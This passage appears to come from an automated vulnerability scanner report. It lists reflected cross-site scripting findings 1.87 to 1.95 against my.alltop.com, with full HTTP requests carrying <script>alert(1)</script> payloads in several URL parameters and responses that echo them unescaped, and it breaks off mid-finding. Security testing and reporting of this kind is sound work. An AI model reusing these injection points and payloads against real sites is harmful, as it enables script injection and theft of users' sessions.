HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:11 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:11 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529)?4ed1c"><script>alert(1)</script>8a0b1056dd5=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.87. http://my.alltop.com/alpha/e ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e

Issue detail

The value of the '"--></style></script><script>netsparker(0x0001C1)</script> request parameter is copied into the HTML document as plain text between tags. The payload dc586<script>alert(1)</script>1f4389f38b1 was submitted in the '"--></style></script><script>netsparker(0x0001C1)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e?'"--></style></script><script>netsparker(0x0001C1)</script>dc586<script>alert(1)</script>1f4389f38b1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:49 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>dc586<script>alert(1)</script>1f4389f38b1" method="post" accept-charset="utf-8">
...[SNIP]...

1.88. http://my.alltop.com/alpha/e [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e55"><script>alert(1)</script>72b10842109 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e90e55"><script>alert(1)</script>72b10842109 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e90e55"><script>alert(1)</script>72b10842109" method="post" accept-charset="utf-8">
...[SNIP]...

1.89. http://my.alltop.com/alpha/e [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5edd"><script>alert(1)</script>7b9bb1b6348 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e?f5edd"><script>alert(1)</script>7b9bb1b6348=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:48 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:49 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:49 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e?f5edd"><script>alert(1)</script>7b9bb1b6348=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.90. http://my.alltop.com/alpha/e [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39e45"><script>alert(1)</script>422134008b7 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00012A)%3C/script%3E39e45"><script>alert(1)</script>422134008b7 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:48 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:50 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:50 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00012A)%3C/script%3E39e45"><script>alert(1)</script>422134008b7" method="post" accept-charset="utf-8">
...[SNIP]...

1.91. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c70c"><script>alert(1)</script>707e2c2dcb3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e'%22--%3E%3C2c70c"><script>alert(1)</script>707e2c2dcb3/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:41 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:43 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:43 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e'%22--%3E%3C2c70c"><script>alert(1)</script>707e2c2dcb3/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.92. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b23a"><script>alert(1)</script>7cee4595916 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e'%22--%3E%3C/style%3E%3C5b23a"><script>alert(1)</script>7cee4595916/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:43 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:43 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:43 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e'%22--%3E%3C/style%3E%3C5b23a"><script>alert(1)</script>7cee4595916/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.93. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81a3a"><script>alert(1)</script>efc66f85147 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C81a3a"><script>alert(1)</script>efc66f85147/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:44 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:44 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:44 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C81a3a"><script>alert(1)</script>efc66f85147/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.94. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76c6f"><script>alert(1)</script>f284e3eac00 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E76c6f"><script>alert(1)</script>f284e3eac00 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:45 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:45 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:45 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E76c6f"><script>alert(1)</script>f284e3eac00" method="post" accept-charset="utf-8">
...[SNIP]...

1.95. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E

Issue detail

